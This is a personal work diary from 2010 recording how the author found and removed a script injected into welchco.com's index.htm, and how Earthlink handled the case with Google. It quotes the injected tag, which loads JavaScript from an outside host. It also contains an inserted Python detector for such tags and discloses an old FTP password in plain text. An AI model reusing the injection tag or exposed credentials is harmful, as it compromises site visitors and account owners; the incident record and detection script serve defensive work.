THE WELCH COMPANY
440 Davis Court #1602
San Francisco, CA 94111-2496
415 781 5700
rod@welchco.com
S U M M A R Y
DIARY: September 7, 2010 04:20 PM Tuesday;
Rod Welch
Earthlink allowed access to welchco.com to add scripts to HTML files.
1...Summary/Objective
2...Password Earthlink Changed
CONTACTS
0201 - Earthlink, Inc.
020101 - Mr. Enrique Cxxxxx
020102 - Customer Representative
020104 - Billing Department
SUBJECTS
Virus Website Attack Welchco com Reported Attack Page Google Blocked
1603 -
1603 - ..
1604 - Summary/Objective
1605 -
160501 - Follow up ref SDS 17 0000. ref SDS 16 0000.
160502 -
160503 -
160504 -
160505 -
160506 -
160508 - ..
1606 -
1607 -
1608 - Background
1609 -
160901 - On 100610 Bryant assisted in opening Wells Fargo checking account,
160902 - that includes ATM services. ref SDS 6 CR7J
160904 - ..
160905 - On 100806 received call from someone (a woman) who has prepared papers
160906 - to change the joint account set up with Millie on 100610 1110,
160907 - ref SDS 6 KD5I, into a single person account.
160909 - ..
160910 - On 100809 0910 meeting at Wells Fargo bank to close joint account with
160911 - Millie and open new sole owner account. ref SDS 12 8349
160913 - ..
160914 - On 100816 1238 received Visa debit card for making charges to the
160915 - checking account without writing checks. ref SDS 15 KD5I
160917 - ..
160918 - On 100816 2104 changed Earthlink billing to reflect new account with
160919 - Millie's death on 100729. ref SDS 16 KD5I
160921 - ..
160922 - On 100825 1037 discovered welchco.com home page reports a virus attack
160923 - on the Internet. Called Earthlink for assistance, and they reported
160924 - there are no improper nor extraneous files on welchco.com directory.
160925 - ref SDS 17 KD5I
160927 - ..
160928 - On 100907 1620 discovered script added to index.htm on welchco.com;
160929 - removed the script and notified Earthlink. ref SDS 0 KD5I Research
160930 - indicates should immediately change ftp password. ref SDS 0 EJ58
160931 -
160932 -
160934 - ..
1610 -
1611 -
1612 - Progress
1613 -
161301 - More research suggested that a "script" may have been added to
161302 - welchco.com files on the Internet that redirect access to welchco.com
161303 - to another website URL that is infected with a virus, and so
161304 -
161305 - Reported Attack Page
161306 -
161307 - ...Google notice prevents access to Firefox users accessing
161308 - welchco.com.
161310 - ..
161311 - Checked source file on the Internet for index.htm on welchco.com
161312 - URL...
161314 - ..
161315 - The local file was last updated on 060601. ref SDS 1 0001
161317 - ..
161318 - At the bottom of index.htm is the following...
161319 -
161320 - types"
161321 - <!.script *ype=*text/java*cript"
161322 - src="http://nuttypiano.com/Scroll_Bar.js">
161323 - </script> <!--e22a84c59ade72b442e091f3fc7de03b-->
161325 - ..
161326 - This is not part of the original code, and so seems to have been added
161327 - by someone, somehow without authorization, assistance, nor knowledge
161328 - of the Welch Company.
161330 - ..
161331 - To correct the problem, deleted index.htm from welchco.com, and
161332 - used ftp to upload the original source file without the script string
161333 - at the bottom of the file.
161335 - ..
161336 - Research on nuttypiano.com indicates it is caused by compromised ftp
161337 - password.
161339 - ..
161340 - Called Earthlink. 100825 1037, ref SDS 17 KD5I
161342 - ..
161343 - Talked to Carla.
161345 - ..
161346 - Carla still does not see any scripts on welchco.com that could be
161347 - causing "Reported Attack Page," which aligns with Ryan's report a few
161348 - weeks ago on 100825 1037. ref SDS 17 PQ8V
161350 - ..
161351 - Carla said her supervisor suggests deleting everything from
161352 - welchco.com and reloading all of it. Review shows there are 16K files
161353 - and 7K folders. This would be a lot of work.
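An alternative to reloading every file is to audit a local copy of the site for the pattern found at the bottom of index.htm. The following is an added example, not part of the original record and not Earthlink's procedure: it flags script tags loaded from hosts outside an allowlist and 32-hex-digit comment markers, and notes whether they sit after the closing html tag. The allowlist, the host `injected.example` and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the site only loads scripts from its own domain.
ALLOWED_HOSTS = {"welchco.com", "www.welchco.com"}
# A comment holding exactly 32 hex digits, like the marker after the injected tag.
MARKER_RE = re.compile(r"^\s*[0-9a-f]{32}\s*$", re.I)

# Constructed sample: a tag and marker appended after </html>.
SAMPLE = """<html><head><script src="js/menu.js"></script></head>
<body><p>Home page</p></body>
</html>
<script type="text/javascript" src="http://injected.example/Scroll_Bar.js">
</script> <!--0123456789abcdef0123456789abcdef-->
"""


class ScriptAudit(HTMLParser):
    """Records (line, kind, value, after_closing_html) for suspicious items."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self.html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src") or ""
        # Relative paths have no hostname and are treated as same-site.
        host = (urlparse(src).hostname or "").lower()
        if host and host not in ALLOWED_HOSTS:
            line = self.getpos()[0]
            self.findings.append((line, "external-script", src, self.html_closed))

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_comment(self, data):
        if MARKER_RE.match(data):
            line = self.getpos()[0]
            self.findings.append((line, "hex-marker", data.strip(), self.html_closed))


def audit_html(text):
    """Return the findings for one HTML document given as a string."""
    parser = ScriptAudit()
    parser.feed(text)
    parser.close()
    return parser.findings


def audit_tree(root):
    """Scan every .htm/.html file under root; return {path: findings} for hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.htm*")):
        found = audit_html(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            report[str(path)] = found
    return report
```

Run `audit_tree` against the local mirror before re-uploading; any file it reports should be compared with the original source file.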
161355 - ..
161356 - Asked to speak with supervisor.
161357 -
161358 -
161360 - ..
1614 -
1615 -
1616 - 1742
161701 - ..
161702 - Talked to supervisor.............. Anna.
161704 - ..
161705 - Initially reviewed the record of telecon with Ryan on 100825, and
161706 - asked Anna if Earthlink feels this is good guidance on solving the
161707 - problem.
161709 - ..
161710 - Anna requested a letter transmitting the record of telecon with Ryan
161711 - on 100825, in order to more carefully and accurately understand what
161712 - Earthlink told the customer. ref SDS 17 PQ8V
161714 - ..
161715 - Submitted a letter to Anna saying...
161716 -
161717 - 1. Subject: Google Report Attack Page welchco.com
161718 - Date: Tue, 07 Sep 2010 17:52:37 -0400
161722 - ..
161723 - 2. Dear Anna,
161725 - ..
161726 - 3. Here are understandings from telecon with Ryan in your office
161727 - on Aug 25, 2010. ref SDS 17 PQ8V
161729 - ..
161730 - 4. Please let me know what more needs to be done to correct this
161731 - problem, and prevent future occurrence.
161733 - ..
161734 - 5. Thanks.
161736 - ..
161737 - 6. Rod
161738 -
161740 - ..
1618 -
1619 -
1620 - 1751
1621 -
162101 - Anna received the letter linked to the record of telecon with Ryan on
162102 - 100825. She indicated Ryan correctly presented Earthlink's guidance
162103 - for solving the problem, reported on 100825 1037. ref SDS 17 PQ8V
162105 - ..
162106 - Anna further feels that since we found an extraneous script today and
162107 - removed it, Google can be notified to remove the notice of "Report
162108 - Attack Page."
162109 -
162110 - [On 100908 1230 letter to Earthlink commends Anna's work
162111 - for successfully lifting Google's notice of "Report Attack
162112 - Page" on welchco.com. ref SDS 19 GE9M
162114 - ..
162115 - Upon discussion, Anna decided that on behalf of Earthlink she will
162116 - implement Google guidance for removing the "Report Attack Page," which
162117 - says in part...
162118 -
162119 - http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.welchco.com/
162121 - ..
162122 - If you are the owner of this web site, you can request a review
162123 - of your site using Google Webmaster Tools. More information
162124 - about the review process is available in Google's Webmaster
162125 - Help Center.
162127 - ..
162128 - Anna off line to coordinate with Google on fixing problem with
162129 - Welchco.com and Earthlink security failure.
162130 -
162131 - [On 100908 1230 access to welchco.com restored using
162132 - Netscape Mozilla Firefox browser with maximum security
162133 - settings, ref SDS 19 KD5I, and as a result of removing a
162134 - script found at the bottom of index.htm for welchco.com,
162135 - and Anna coordinating to implement Google guidance on
162136 - removing "Report Attack Page," per above, ref SDS 0 LF78,
162137 - displayed on all welchco files on the Internet accessed
162138 - from home page, first reported on 100825 1037. ref SDS 17
162139 - KD5I
162145 -
162147 - ..
1622 -
1623 -
1624 - 1833
1625 -
162501 - Anna reported that she completed communication with Google to notify
162502 - that the script causing "Report Attack Page" has been removed, and asking
162503 - Google to scan the site again.
162505 - ..
162506 - Anna received a reply from Google saying they will notify Earthlink
162507 - in an hour or so of their findings on scanning welchco.com site
162508 - again.
162510 - ..
162511 - Anna is going off shift in an hour. She will leave instructions for
162512 - her replacement supervisor, Len, for her to follow up and verify that
162513 - Google reports the site is now clear, or there is still a problem of
162514 - some kind that requires further repair.
162515 -
162516 - [...below received letter from Earthlink, reporting no
162517 - report from Google on correcting problem of "Report Attack
162518 - Page" on welchco.com. ref SDS 0 4S4K
162536 - ..
162537 - Anna is sending a letter confirming this work plan.
162538 -
162540 - ..
1626 -
1627 -
1628 - 1838
1629 -
162901 - Received Anna's letter saying...
162902 -
162903 - 1. Subject: Re: Google Report Attack Page welchco.com
162904 - Date: Tue, 7 Sep 2010 18:38:09 -0400 (EDT)
162905 - From: dizoa@support.earthlink.net
162906 - To: Rod Welch
162908 - ..
162909 - 2. Hi,
162910 -
162911 - I understand that an hour and a half you have removed a
162912 - malicious code from your index page and in doing that we would
162913 - need to request again google to review your website files for
162914 - them to be able to remove the report attack site page
162916 - ..
162917 - 3. On your behalf, I have already request from the Google
162918 - webmaster tools page to request a malware review. This may
162919 - actually take some time for them to do and later on we just
162920 - need to log back in to the webmaster tools to check on the
162921 - result:
162923 - ..
162924 - 4. Link to it is :
162925 -
162926 - https://www.google.com/webmasters/tools/home?hl=en
162928 - ..
162929 - 5. I will be endorsing this issue to the next supervisor to check
162930 - the result of the malware review request that I have done on
162931 - the google webmaster tools.
162932 -
162953 - ..
162954 - 6. I have also asked the supervisor to call you back at
162955 - 415-*** **** for updates.
162957 - ..
162958 - 7. Note: For security reasons, do not email your username and
162959 - password. Please call Earthlink Web Hosting at (800) 955-0186
162960 - if you have other questions about your service.
162962 - ..
162963 - 8. CONFIDENTIALITY NOTICE: The information contained in this
162964 - e-mail message, including any attachments, is for the sole use
162965 - of the intended recipient(s) and may contain confidential and
162966 - privileged information. Any unauthorized review, use,
162967 - disclosure or distribution is prohibited. If you are not the
162968 - intended recipient, and have received this communication in
162969 - error, please contact the sender by reply e-mail and destroy
162970 - all copies of the original message.
162971 -
162972 -
162974 - ..
1630 -
1631 -
1632 - 1902
1633 -
163301 - Ross recommends changing password to welchco.com for ftp ops.
163302 -
163303 - The password was created on 080319. ref SDS 3 BV85
163305 - ..
163306 - How do we change password to upload files to welchco.com?
163308 - ..
163309 - Tried to open "My Account" on Earthlink Internet using the link
163310 - provided in letters from Earthlink (needs cookies on in IE)...
163311 -
163312 - https://myaccount.earthlink.net/cam/login.jsp?redirect=%2Fcam%2Findex.jsp&x=-1399657974
163314 - ..
163315 - This failed, and so is a new problem. Could not use access
163316 - identification that worked for updating billing accounts on 100816
163317 - 2104. ref SDS 16 FV42
163318 -
163319 - [...below on 100907 1620 at 0031 called Earthlink and got
163320 - assistance changing the password. ref SDS 0 KO9N
163322 - ..
163323 - [On 100908 1230 testing shows new password now working for
163324 - ftp ops. ref SDS 19 GE9M
163326 - ..
163327 - [On 100908 1220 at 1829 discovered Earthlink fixed problem
163328 - so that new password is now working. ref SDS 19 4S4Y
163329 -
163330 -
163332 - ..
1634 -
1635 -
1636 - 0050
1637 -
163701 - Received letter from Earthlink saying...
163702 -
163703 - 1. Subject: Google Malware Request Review
163704 - Date: Wed, 8 Sep 2010 12:45:50 +0800
163705 - From: "[ELNK WH Support] Arvee" <francisco1@support.earthlink.net>
163706 - To:
163708 - ..
163709 - 2. Hi Rod,
163710 -
163711 - Good Day! I'm writing this email in behalf of Anna.
163713 - ..
163714 - I've monitored Google for any updates regarding the Malware
163715 - Review Request that Anna processed for you, unfortunately,
163716 - there are no updates yet regarding your concern. [...referring
163717 - to Anna's work reported today on 100907 1620 at 1833, per
163718 - above. ref SDS 0 0R3B and confirmed in Anna's letter received
163719 - at 1838, per above. ref SDS 0 PT83...]
163720 -
163721 - [...below on 100907 1620 responded to Earthlink notifying
163722 - that virus problem invading welchco.com on Earthlink
163723 - servers still not cleared, and new problem of new password
163724 - not working for ftp ops. ref SDS 0 OK5X
163742 - ..
163743 - I'm very sure that Anna would be on top of this once she is in
163744 - the office at 8 or 9 am EST. She also informed me that if any
163745 - updates come up, she will be in contact with you, either by
163746 - email or through phone. I apologize for the inconvenience, but
163747 - we assure you that we are doing the best that we can to get
163748 - this resolved as soon as possible. Thank you for
163749 - understanding.
163750 -
1638 -
SUBJECTS
Virus Attack Page Google Report Domain name: Welchco.com Network Cen
2803 -
2804 - 0031
280501 - ..
280502 - Password Earthlink Changed
280503 -
280504 - To resolve problem of virus invading SDS records on welchco.com, per
280505 - above, ref SDS 0 KD5I, investigated source page for Communication
280506 - Metrics home page, index.htm, and discovered someone evidently
280507 - compromised the password required to upload files to welchco.com
280508 - domain, and added a "virus" script at the bottom. ref SDS 0 BJ3G The
280509 - solution was to delete compromised index.htm file, and upload the
280510 - correct version. ref SDS 0 EJ53 Anna, the Earthlink supervisor then
280511 - contacted Google to request another evaluation of welchco.com records
280512 - on the web site. ref SDS 0 M18Q
280514 - ..
280515 - As a result of difficulty using My Account on line, per above,
280516 - ref SDS 0 PT5F, late this evening, called Earthlink at the number
280517 - reported on 100825 1037, ref SDS 17 KD5I
280519 - ..
280520 - Talked to Mike.
280522 - ..
280523 - Mike changed password to...
280527 - ..
280528 - This changes password for ftp and to access My Account for web
280529 - hosting, reported in the record on 100816 2104. ref SDS 16 FV42
280530 -
280531 - [On 100912 0948 password to access "My Account" for email
280532 - on Earthlink is different from password for web hosting.
280533 - ref SDS 20 KH3M
280535 - ..
280536 - Earthlink case number....................... 155308001
280537 -
280538 - [On 100908 1230 discovered Earthlink fixed the problem
280539 - ref SDS 19 KD5I
280540 -
280541 - [On 100908 1230 new problem to fix password access, was
280542 - assigned another problem #. ref SDS 19 WP8K
280544 - ..
280545 - Then had to update SDS code to apply new password for seamless ftp
280546 - ops.
280548 - ..
280549 - Updated SDS code for ftp developed on 060614 1510. ref SDS 2 CH8Y
280551 - ..
280552 - The only file to change....
280554 - ..
280555 - Line 60, ref OF 1 QP7J, -label format in c: 01 04 009040
280556 - Line 60, ref OF 3 QP7J, -label format in c: 01 14 009040
280557 -
280558 - -label format
280559 - loc_cur 3 1
280560 - split
280563 -
280564 - Changed ftp script to new password, per above. ref SDS 0 KH6F
280566 - ..
280567 - Tried new password with ftp program, and this failed. Worked with
280568 - old password.
280569 -
280570 - [...below letter notifies Earthlink new password for
280571 - welchco.com not working. ref SDS 0 OK6Q
280572 -
280575 -
280577 - ..
2806 -
2807 -
2808 - 0100
2809 -
280901 - Sent a letter to Earthlink...
280902 -
280903 - 1. Subject: Google Malware Request Review
280904 - Date: Wed, 08 Sep 2010 01:10:22 -0400
280911 - ..
280912 - 2. Thanks for the update on Anna's work earlier today on fixing
280913 - the problem Google is reporting on welchco.com hosted on
280914 - Earthlink, per above, ref SDS 0 KD5I, as shown in your letter
280915 - received a few minutes ago. ref SDS 0 9F8N
280916 -
280932 - ..
280933 - 3. I just called and talked to Mike. He changed my password to
280934 - reduce exposure to future attacks on my website. ref SDS 0 KO9N
280935 - I just tried to FTP my site, and could not log on with the new
280936 - password. ref SDS 0 8A4G Is there a delay between getting the
280937 - password and using it? If not, I need to verify the password.
280938 - We did this by telephone, but may have had a pronunciation
280939 - issue.
280941 - ..
280942 - 4. I just tried the new password to access My Account. Entered my
280943 - email address and the new password, and nothing happens. Tried
280944 - the old password - poims - and that failed also.
280945 -
280949 - ..
280950 - 5. Need help.
280951 -
2810 -
Distribution. . . . See "CONTACTS"